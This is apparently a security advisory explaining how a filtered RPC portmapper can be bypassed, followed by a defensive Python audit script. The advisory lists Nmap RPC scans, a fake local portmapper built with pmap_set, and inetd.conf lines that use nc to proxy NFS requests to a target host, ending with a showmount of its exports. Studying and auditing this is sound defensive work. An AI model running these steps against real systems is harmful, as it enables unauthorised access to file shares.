Portmapper is a registry of Remote Procedure Call (RPC) services; for each service it records the RPC program number, version number, protocol (TCP/UDP) and port. It generally listens on port 111 TCP/UDP.
When a client wishes to connect to a service it first contacts the Portmapper. An administrator may filter this port believing that it will prevent an attacker from connecting to the services offered; however, this is not the case, as an attacker may replicate the portmapper locally and proxy requests to the target machine.
Impact: An attacker may be able to connect to vulnerable services offered behind a filtered Portmapper.
Affected: Unix servers
First of all, determine the offered RPC services using Nmap (port ranges are comma separated; newer Nmap releases fold the RPC scan into version detection, -sV):
nmap -sR 10.0.0.1 -p 111-5000,20000-50000
nmap -sUR 10.0.0.1 -p 111-5000,20000-50000
Create a portmapper file containing the information discovered by Nmap. Each line is "program version protocol port name", the format pmap_dump writes and pmap_set reads; the RPC program numbers are 100000 for the portmapper and 100003 for nfs:
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
Start a local portmapper and load the port map file into it:
# portmap
# pmap_set < rpc_file_data
Test the setup by running rpcinfo against YOUR machine:
# rpcinfo -p 127.0.0.1
Now it is time to set up the attacking machine to redirect to the target.
Store the mappings in a tab separated inetd file, inetd.conf, as:
2049 stream tcp nowait root /usr/sbin/tcpd /bin/nc 10.0.0.1 2049
2049 dgram  udp wait   root /usr/sbin/tcpd /bin/nc -u 10.0.0.1 2049
Then restart inetd with that file:
# killall inetd
# inetd ./inetd.conf
Services requested on the local machine will now be looked up in the local portmapper but proxy-redirected to the target server, so ordinary client software can be used, as in the following example:
# showmount -e 127.0.0.1
Export list for 127.0.0.1:
/ (everyone)
This output is not for 127.0.0.1 but for the target server!
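The defensive counterpart of the procedure above, as an added example that is not part of the original page: a small audit script that parses a service map in the pmap_dump/pmap_set line format and reports which RPC service ports a firewall policy leaves reachable, showing that a rule blocking only 111 still exposes nfs on 2049. The sample map and the policy sets are constructed for the example.

```python
# Added audit helper (not from the original page): parse an RPC map in the
# pmap_dump(8)/pmap_set(8) line format "program version protocol port [name]"
# and list the service ports a firewall policy leaves reachable.
# Constructed sample in pmap_set format. Program numbers are the real RPC
# assignments: 100000 = portmapper, 100003 = nfs.
SAMPLE_MAP = """\
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
"""

PORTMAPPER_PROGRAM = 100000


def parse_rpc_map(text):
    """Return (program, version, proto, port, name) tuples. Blank lines and
    '#' comments are skipped; a malformed line raises rather than guessing."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 4 or fields[2] not in ("tcp", "udp"):
            raise ValueError("line %d: bad pmap_set entry: %r" % (lineno, raw))
        name = fields[4] if len(fields) > 4 else ""
        entries.append((int(fields[0]), int(fields[1]), fields[2],
                        int(fields[3]), name))
    return entries


def exposed_service_ports(entries, blocked):
    """Return sorted (proto, port, name) of non-portmapper services whose
    (proto, port) is not in `blocked`, the set of pairs the firewall drops.
    Blocking only 111 stops lookups, not the services themselves."""
    exposed = set()
    for program, _version, proto, port, name in entries:
        if program != PORTMAPPER_PROGRAM and (proto, port) not in blocked:
            exposed.add((proto, port, name))
    return sorted(exposed)


if __name__ == "__main__":
    only_111 = {("tcp", 111), ("udp", 111)}  # the policy the page warns about
    for proto, port, name in exposed_service_ports(parse_rpc_map(SAMPLE_MAP), only_111):
        print("still reachable without the portmapper: %s/%d %s" % (proto, port, name))
```

Feed it the output of pmap_dump (or the file built from the Nmap results) and the actual filter set to see which service ports still need their own rules.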